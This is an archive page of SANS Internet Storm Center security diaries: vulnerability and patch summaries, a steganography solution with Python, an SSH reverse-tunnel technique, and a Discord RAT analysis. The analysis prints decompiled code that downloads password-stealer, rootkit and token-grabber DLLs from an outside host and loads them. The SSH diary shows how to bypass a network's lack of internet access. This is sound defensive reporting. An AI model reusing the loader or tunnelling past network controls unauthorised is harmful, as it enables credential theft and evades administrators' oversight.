Tag Archives: SANS

Web Scanning SonicWall for CVE-2021-20016 – Update, (Wed, May 14th)

This post was originally published on this site

On 29 Apr 2025 I published a diary [1] on scanning activity looking for SonicWall devices, and since that publication this activity has grown 10-fold. Over the past 14 days, several BACS students have reported SonicWall scanning activity, all targeting the same 2 URLs [4][5] mentioned in my last diary. My own DShield sensor was probed by 25 separate IPs during those 14 days. The three most active IPs were all from the same subnet, 141.98.80.0/24.

Microsoft Patch Tuesday: May 2025, (Tue, May 13th)


Today, Microsoft released its expected May Patch Tuesday update. This update fixes 78 vulnerabilities: 11 are rated critical and 66 important. Five of the vulnerabilities have already been exploited, and two were publicly known but not yet exploited. 70 of the vulnerabilities were patched today; 8 had patches delivered earlier this month.

Apple Updates Everything: May 2025 Edition, (Mon, May 12th)


Apple released its expected update for all its operating systems. The update, in addition to providing new features, patches 65 different vulnerabilities. Many of these vulnerabilities affect multiple operating systems within the Apple ecosystem.

Of note is CVE-2025-31200. This vulnerability is already exploited in "targeted attacks". Apple released patches for this vulnerability in mid-April for its current operating systems (iOS 18, macOS 15, tvOS 18, and visionOS 2). This update includes patches for older versions of macOS and iPadOS/iOS.

 

The updates released are iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, watchOS 11.5, tvOS 18.5 and visionOS 2.5. For each vulnerability, the releases that include the fix are listed.

CVE-2025-24097: An app may be able to read arbitrary file metadata.
Affects AirDrop. Patched in: iPadOS 17.7.7

CVE-2025-24111: An app may be able to cause unexpected system termination.
Affects Display. Patched in: iPadOS 17.7.7

CVE-2025-24142: An app may be able to access sensitive user data.
Affects Notification Center. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-24144: An app may be able to leak sensitive kernel state.
Affects Kernel. Patched in: iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-24155: An app may be able to disclose kernel memory.
Affects WebContentFilter. Patched in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-24213: A type confusion issue could lead to memory corruption.
Affects WebKit. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-24220: An app may be able to read a persistent device identifier.
Affects Sandbox Profiles. Patched in: iPadOS 17.7.7

CVE-2025-24222: Processing maliciously crafted web content may lead to an unexpected process crash.
Affects BOM. Patched in: macOS Sequoia 15.5

CVE-2025-24223: Processing maliciously crafted web content may lead to memory corruption.
Affects WebKit. Patched in: macOS Sequoia 15.5

CVE-2025-24225: Processing an email may lead to user interface spoofing.
Affects Mail Addressing. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7

CVE-2025-24258: An app may be able to gain root privileges.
Affects DiskArbitration. Patched in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-24259: An app may be able to retrieve Safari bookmarks without an entitlement check.
Affects Parental Controls. Patched in: iPadOS 17.7.7

CVE-2025-24274: A malicious app may be able to gain root privileges.
Affects Mobile Device Service. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-30440: An app may be able to bypass ASLR.
Affects Libinfo. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-30442: An app may be able to gain elevated privileges.
Affects SoftwareUpdate. Patched in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-30443: An app may be able to access user-sensitive data.
Affects Found in Apps. Patched in: macOS Sequoia 15.5

CVE-2025-30448: An attacker may be able to turn on sharing of an iCloud folder without authentication.
Affects iCloud Document Sharing. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, visionOS 2.5

CVE-2025-30453: A malicious app may be able to gain root privileges.
Affects DiskArbitration. Patched in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31196: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.
Affects CoreGraphics. Patched in: iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31200: Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS released before iOS 18.4.1.
Affects CoreAudio. Patched in: watchOS 11.5

CVE-2025-31204: Processing maliciously crafted web content may lead to memory corruption.
Affects WebKit. Patched in: iOS/iPadOS 18.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31205: A malicious website may exfiltrate data cross-origin.
Affects WebKit. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31206: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31207: An app may be able to enumerate a user's installed apps.
Affects FrontBoard. Patched in: iOS/iPadOS 18.5

CVE-2025-31208: Parsing a file may lead to an unexpected app termination.
Affects CoreAudio. Patched in: all eight releases

CVE-2025-31209: Parsing a file may lead to disclosure of user information.
Affects CoreGraphics. Patched in: all eight releases

CVE-2025-31210: Processing web content may lead to a denial-of-service.
Affects FaceTime. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7

CVE-2025-31212: An app may be able to access sensitive user data.
Affects Core Bluetooth. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31213: An app may be able to access associated usernames and websites in a user's iCloud Keychain.
Affects Security. Patched in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31214: An attacker in a privileged network position may be able to intercept network traffic.
Affects Baseband. Patched in: iOS/iPadOS 18.5

CVE-2025-31215: Processing maliciously crafted web content may lead to an unexpected process crash.
Affects WebKit. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31217: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31218: An app may be able to observe the hostnames of new network connections.
Affects NetworkExtension. Patched in: macOS Sequoia 15.5

CVE-2025-31219: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
Affects Kernel. Patched in: all eight releases

CVE-2025-31220: A malicious app may be able to read sensitive location information.
Affects Weather. Patched in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31221: A remote attacker may be able to leak memory.
Affects Security. Patched in: all eight releases

CVE-2025-31222: A user may be able to elevate privileges.
Affects mDNSResponder. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31224: An app may be able to bypass certain Privacy preferences.
Affects Sandbox. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31225: Call history from deleted apps may still appear in spotlight search results.
Affects Call History. Patched in: iOS/iPadOS 18.5

CVE-2025-31226: Processing a maliciously crafted image may lead to a denial-of-service.
Affects ImageIO. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31227: An attacker with physical access to a device may be able to access a deleted call recording.
Affects Notes. Patched in: iOS/iPadOS 18.5

CVE-2025-31228: An attacker with physical access to a device may be able to access notes from the lock screen.
Affects Notes. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7

CVE-2025-31232: A sandboxed app may be able to access sensitive user data.
Affects Installer. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31233: Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory.
Affects CoreMedia. Patched in: all eight releases

CVE-2025-31234: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
Affects Pro Res. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5

CVE-2025-31235: An app may be able to cause unexpected system termination.
Affects Audio. Patched in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31236: An app may be able to access sensitive user data.
Affects Finder. Patched in: macOS Sequoia 15.5

CVE-2025-31237: Mounting a maliciously crafted AFP network share may lead to system termination.
Affects afpfs. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31238: Processing maliciously crafted web content may lead to memory corruption.
Affects WebKit. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31239: Parsing a file may lead to an unexpected app termination.
Affects CoreMedia. Patched in: all eight releases

CVE-2025-31241: A remote attacker may cause an unexpected app termination.
Affects Kernel. Patched in: all eight releases

CVE-2025-31242: An app may be able to access sensitive user data.
Affects StoreKit. Patched in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31244: An app may be able to break out of its sandbox.
Affects quarantine. Patched in: macOS Sequoia 15.5

CVE-2025-31245: An app may be able to cause unexpected system termination.
Affects Pro Res. Patched in: iOS/iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, tvOS 18.5, visionOS 2.5

CVE-2025-31246: Connecting to a malicious AFP server may corrupt kernel memory.
Affects afpfs. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6

CVE-2025-31247: An attacker may gain access to protected parts of the file system.
Affects SharedFileList. Patched in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

CVE-2025-31249: An app may be able to access sensitive user data.
Affects Sandbox. Patched in: macOS Sequoia 15.5

CVE-2025-31250: An app may be able to access sensitive user data.
Affects TCC. Patched in: macOS Sequoia 15.5

CVE-2025-31251: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
Affects AppleJPEG. Patched in: all eight releases

CVE-2025-31253: Muting the microphone during a FaceTime call may not result in audio being silenced.
Affects FaceTime. Patched in: iOS/iPadOS 18.5

CVE-2025-31256: Hot corner may unexpectedly reveal a user's deleted notes.
Affects Notes. Patched in: macOS Sequoia 15.5

CVE-2025-31257: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit. Patched in: iOS/iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

CVE-2025-31258: An app may be able to break out of its sandbox.
Affects RemoteViewServices. Patched in: macOS Sequoia 15.5

CVE-2025-31259: An app may be able to gain elevated privileges.
Affects SoftwareUpdate. Patched in: macOS Sequoia 15.5

CVE-2025-31260: An app may be able to access sensitive user data.
Affects Apple Intelligence Reports. Patched in: macOS Sequoia 15.5


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

It Is 2025, And We Are Still Dealing With Default IoT Passwords And Stupid 2013 Router Vulnerabilities, (Mon, May 12th)


Unipi Technologies is a company developing programmable logic controllers for a number of different applications like home automation, building management, and industrial controls. The modules produced by Unipi are likely to appeal to a more professional audience. All modules are based on the "Marvis" platform, a customized Linux distribution maintained by Unipi.

Steganography Challenge: My Solution, (Sat, May 10th)


When I tried to solve "Steganography Challenge" with the same method as I used in "Steganography Analysis With pngdump.py: Bitstreams", I couldn't recover the text message.

So I looked into the source code of the encoding function EncodeNRGBA, and noticed this:

To encode the pixels, there are 2 nested for loops: "for x" (outer) and "for y" (inner). This means that the image is processed column by column (y varies fastest).

A raw bitmap, however, is stored one line after the other (not one column after the other). Thus we need to transpose the raw bitmap (rows and columns need to be swapped):

And as 8-bit RGB encoding is used for pixels, each pixel is encoded with 3 bytes, which need to be moved together during the transposition:

This transposition can be done with my tool translate.py and a suitable Python function. I wrote this one to do the transposition:

def Transpose(data, size, width, height):
    # data: row-major raw bitmap; size: bytes per pixel (3 for 8-bit RGB)
    # Walk the pixels column by column (x outer, y inner), the order EncodeNRGBA uses
    result = []
    for x in range(width):
        for y in range(height):
            i = y * width + x  # index of pixel (x, y) in the row-major bitmap
            result.append(data[i*size:(i + 1)*size])
    return b''.join(result)

So let's decode this.

First we need the dimensions of the image:

1195 pixels wide and 642 pixels high.

With this information, I can do the transposition with translate.py (3 is the number of bytes per pixel): Transpose(data, 3, 1195, 642)

Then I use the following command to decode the size of the message. It's the same command as I used in diary entry "Steganography Analysis With pngdump.py: Bitstreams", except that this time there's an extra step (translate) to do the transposition:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f -s transpose.py "lambda data: Transpose(data, 3, 1195, 642)" | cut-bytes.py 0:32l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | format-bytes.py

The message is 547 bytes long. Let's decode this:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f -s transpose.py "lambda data: Transpose(data, 3, 1195, 642)" | cut-bytes.py 32:4376l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"

We were able to extract the text message (a partial copy from the Wikipedia article on Stegosaurus).

But what surprised me is the lack of space characters … I thought that this could hardly be due to an error in the decoding, so I took a look at the test encoder source code. Line 19 contains the message encoded as decimal bytes, and I noticed that there are no values equal to 32 (that's the space character). Decoding this line with numbers-to-string.py does indeed reveal that there are no space characters in the source code:

The solution to this challenge is identical to the one described in diary entry "Steganography Analysis With pngdump.py: Bitstreams", with one important difference: we need to transpose lines and columns.

Finally, if you want to write this command as a one-liner without a file containing the source code for the Transpose Python function, you can do this with nested list comprehensions, but it's less readable:

pngdump.py -R -d encoded_stegosaurus.png | translate.py -f "lambda data: b''.join([b''.join([data[(y*1195+x)*3:(y*1195+x+1)*3] for y in range(642)]) for x in range(1195)])" | cut-bytes.py 32:4376l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>"
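As an added example that is not Didier's code nor the challenge's code, the following Python reproduces the whole pipeline offline on a constructed 40x30 raw RGB bitmap: an encoder that mimics the column-first loop order described above, and a decoder that transposes (same algorithm as the Transpose function), takes the LSB of every channel byte, reads the length field and then the message. The bit layout is an assumption drawn from the diary's commands: one bit per R, G and B byte, a 32-bit big-endian length first, then the message bytes most significant bit first.

```python
import random


def transpose(data, size, width, height):
    """Row-major raw bitmap -> column-major pixel order (x outer, y inner)."""
    result = []
    for x in range(width):
        for y in range(height):
            i = y * width + x  # index of pixel (x, y) in the row-major bitmap
            result.append(data[i * size:(i + 1) * size])
    return b"".join(result)


def bits_to_int(bits):
    value = 0
    for bit in bits:
        value = (value << 1) | bit
    return value


def encode_message(cover_rgb, width, height, message):
    """Emulate the challenge encoder (assumed layout): walk pixels column by
    column and store one payload bit in the LSB of each R, G and B byte."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    if len(bits) > width * height * 3:
        raise ValueError("cover image too small for the payload")
    out = bytearray(cover_rgb)
    n = 0
    for x in range(width):
        for y in range(height):
            base = (y * width + x) * 3  # row-major offset of pixel (x, y)
            for c in range(3):
                if n == len(bits):
                    return bytes(out)
                out[base + c] = (out[base + c] & 0xFE) | bits[n]
                n += 1
    return bytes(out)


def decode_message(stego_rgb, width, height, column_major=True):
    """Transpose (unless column_major is False, to show what forgetting the
    transposition does), collect every LSB, parse the 32-bit length, then the body."""
    data = transpose(stego_rgb, 3, width, height) if column_major else stego_rgb
    bits = [b & 1 for b in data]
    length = bits_to_int(bits[:32])
    if 32 + length * 8 > len(bits):
        raise ValueError(f"length field {length} exceeds what the image can hold")
    body = bits[32:32 + length * 8]
    return bytes(bits_to_int(body[i:i + 8]) for i in range(0, len(body), 8))


# Constructed cover: 40x30 pixels of deterministic pseudo-random RGB noise (3600 bytes).
WIDTH, HEIGHT = 40, 30
_rng = random.Random(1)
COVER = bytes(_rng.getrandbits(8) for _ in range(WIDTH * HEIGHT * 3))
MESSAGE = b"Stegosaurus is a genus of herbivorous, four-legged, armored dinosaur."
STEGO = encode_message(COVER, WIDTH, HEIGHT, MESSAGE)

if __name__ == "__main__":
    print(decode_message(STEGO, WIDTH, HEIGHT))
```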

Didier Stevens
Senior handler
blog.DidierStevens.com


No Internet Access? SSH to the Rescue!, (Thu, May 8th)


This quick diary is a perfect example of why I love Linux (or UNIX in general) operating systems. There is always a way to "escape" settings imposed by an admin…

Disclaimer: This has been used for testing purpose in the scope of a security assessment project. Don't break your organization security policies!

To perform some assessments on a remote network, a customer provided me with a VM running Ubuntu, reachable through SSH (with IP filtering, SSH key authentication only, etc). Once logged on to the system, I started to work but I was lacking some tools and decided to install them. Bad news… The VM had no Internet access. No problem, we have SSH access!

Let's assume the following environment:

  • server.acme.org is the VM. SSH listening on port 65022.
  • client.sans.edu is my workstation with SSH listening on port 22.

Step 1: From client.sans.edu, connect to the server in one terminal and create a reverse tunnel ("-R" option):

ssh -p 65022 -i .ssh/privatekey -R 2222:localhost:22 xavier@server.acme.org

Step 2: Start a second session to the server, from a second terminal:

ssh -p 65022 -i .ssh/privatekey xavier@server.acme.org

Step 3: From the second session, connect back to the client and set up a dynamic port forwarding ("-D"):

ssh -p 2222 -D 1080 xavier@localhost

Step 4: From the first session, create environment variables:

export http_proxy=socks5h://127.0.0.1:1080
export https_proxy=socks5h://127.0.0.1:1080
curl https://ipinfo.io/

Curl should tell you that your IP address is the one of client.sans.edu!

Now, all tools honoring these variables will have access to the Internet through your client! Slow but effective!

There are surely many other ways to achieve this but… that's the magic of UNIX, there are always plenty of ways to solve issues… Please share your ideas or techniques!
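As an added, defender-side check that is not part of Xavier's diary, the Python below models the sshd_config(5) directives on server.acme.org that decide whether the reverse tunnel of step 1 is accepted: AllowTcpForwarding (default yes; "no" or "local" refuses -R listeners) and PermitListen ("none" refuses all remote listeners). It assumes sshd's rule that the first value given for a keyword wins, inspects only the global section and merely reports Match blocks instead of evaluating them; both configurations are constructed samples.

```python
import re

# Directive names as sshd_config(5) spells them; sshd matches keywords case-insensitively.
REMOTE_FORWARDING_KEYWORDS = ("allowtcpforwarding", "permitlisten")


def parse_global_directives(config_text):
    """Return ({keyword: first value}, [Match lines]) for the global section only."""
    directives, match_lines = {}, []
    in_match = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd accepts "Keyword value" as well as "Keyword=value"
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        keyword = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ""
        if keyword == "match":
            in_match = True  # everything below applies only to matching sessions
            match_lines.append(line)
            continue
        if not in_match:
            directives.setdefault(keyword, value)  # sshd keeps the first value it reads
    return directives, match_lines


def reverse_forwarding_allowed(config_text):
    """(allowed, reason): may a client open an -R listener on this sshd?"""
    directives, match_lines = parse_global_directives(config_text)
    forwarding = directives.get("allowtcpforwarding", "yes").lower()
    if forwarding in ("no", "local"):
        return False, f"AllowTcpForwarding {forwarding}"
    listen = directives.get("permitlisten", "any").lower()
    if listen == "none":
        return False, "PermitListen none"
    note = " (Match blocks present; review them)" if match_lines else ""
    return True, f"AllowTcpForwarding {forwarding}, PermitListen {listen}{note}"


# Constructed sample: a typical key-only setup that never mentions forwarding,
# so the default (AllowTcpForwarding yes) lets the diary's -R 2222:localhost:22 through.
WEAK_CONFIG = """\
Port 65022
PasswordAuthentication no
PubkeyAuthentication yes
"""

# Constructed sample: -L/-D stay possible for clients, -R listeners are refused;
# the second AllowTcpForwarding line is ignored because sshd keeps the first one.
HARDENED_CONFIG = """\
Port 65022
PasswordAuthentication no
AllowTcpForwarding local
AllowTcpForwarding yes
PermitListen none
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, reverse_forwarding_allowed(cfg))
```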

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


Example of "Modular" Malware, (Wed, May 7th)


Developers (of malware as well as goodware) don't have to reinvent the wheel all the time. Why rewrite a piece of code that was developed by someone else? In the same way, all operating systems provide API calls (or system calls) to interact with the hardware (open a file, display a pixel, send a packet over the wire, etc). These system calls are grouped in libraries (example: Windows provides wininet.dll to interact with networks).

Briefly, developers have different ways to use libraries:

  • Static linking: The library is added (appended) to the user code by the linker at compilation time.
  • Dynamic loading: The library is loaded by the "loader" when the program is started and made available to the program (the well-known "DLL" files).
  • On-demand loading: The developer decides at runtime that it's now time to load an extra DLL into the program environment.

In the malware ecosystem, the third method is pretty cool because attackers can develop "modular" malware that expands its capabilities only when needed. Let's imagine a malware sample that first footprints the victim's computer. If the victim is an administrative employee and some SAP-related files or processes are discovered by the malware, it can fetch a specific DLL from a C2 server and load it to add features targeting SAP systems. Besides the fact that the malware is smaller, it may also look less suspicious.

Here is an example of such malware that expands its capabilities on demand. The file is a Discord RAT (SHA256: 9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e)[1]. The sample is a .NET malware and can be easily decompiled. Good news: there is no obfuscation implemented and the code is pretty easy to read.

The list of "modules" or external DLLs is provided in a dictionary:

public static Dictionary<string, string> dll_url_holder = new Dictionary<string, string>
{
  { "password", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll" },
  { "rootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll" },
  { "unrootkit", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dll" },
  { "webcam", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll" },
  { "token", "hxxps://raw[.]githubusercontent[.]com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabber.dll" }
};

Let's take an example: Webcam.dll:

remnux@remnux:/MalwareZoo/20250507$ file Webcam.dll
Webcam.dll: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows

DLLs are loaded only when required by the malware. The RAT has a command "webcampic" to take a picture of the victim:

"--> !webcampic = Take a picture out of the selected webcam"

Let's review the function associated with this command:

public static async Task webcampic(string channelid)
{
    if (!dll_holder.ContainsKey("webcam"))
    {
        await LoadDll("webcam", await LinkToBytes(dll_url_holder["webcam"]));
    }
    if (!activator_holder.ContainsKey("webcam"))
    {
        activator_holder["webcam"] = Activator.CreateInstance(dll_holder["webcam"].GetType("Webcam.webcam"));
        activator_holder["webcam"].GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    }
    object obj = activator_holder["webcam"];
    obj.GetType().GetMethod("init").Invoke(activator_holder["webcam"], new object[0]);
    if ((obj.GetType().GetField("cameras").GetValue(obj) as IDictionary<int, string>).Count < 1)
    {
        await Send_message(channelid, "No cameras found!");
        await Send_message(channelid, "Command executed!");
        return;
    }
    try
    {
        byte[] item = (byte[])obj.GetType().GetMethod("GetImage").Invoke(obj, new object[0]);
        await Send_attachment(channelid, "", new List<byte[]> { item }, new string[1] { "webcam.jpg" });
        await Send_message(channelid, "Command executed!");
    }
    catch
    {
        await Send_message(channelid, "Error taking picture!");
        await Send_message(channelid, "Command executed!");
    }
}

"dll_holder" is a dictionary that contains the loaded DLLs (as Assembly objects returned by Assembly.Load):

public static async Task LoadDll(string name, byte[] data)
{
    dll_holder[name] = Assembly.Load(data);
}

In the webcam function, if the DLL has not been loaded yet, the DLL file is fetched from the Git repository, converted into a byte array and loaded in memory. Once the DLL is loaded, its main class is instantiated and called through reflection. Here is the decompiled code of Webcam.dll:

namespace Webcam
{
    public class webcam
    {
        public static Dictionary<string, bool> ready = new Dictionary<string, bool>();
        public static Dictionary<string, Bitmap> holder = new Dictionary<string, Bitmap>();
        public static Dictionary<int, string> cameras = new Dictionary<int, string>();
        public static int selected = 1;
        public static string GetWebcams()
        {
            // Code removed
        }
        public static byte[] GetImage()
        {
            // Code removed
        }
        private static void video_NewFrame(object sender, NewFrameEventArgs eventArgs, string key)
        {
            // Code removed
        }
        public static bool select(int num)
        {
            // Code removed
        }
        public static void init()
        {
            GetWebcams();
        }
    }
}

This is a simple example of "modular" malware! Happy Hunting!

[1] https://www.virustotal.com/gui/file/9cac561e2da992f974286bdb336985c1ee550abd96df68f7e44ce873ef713f4e/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
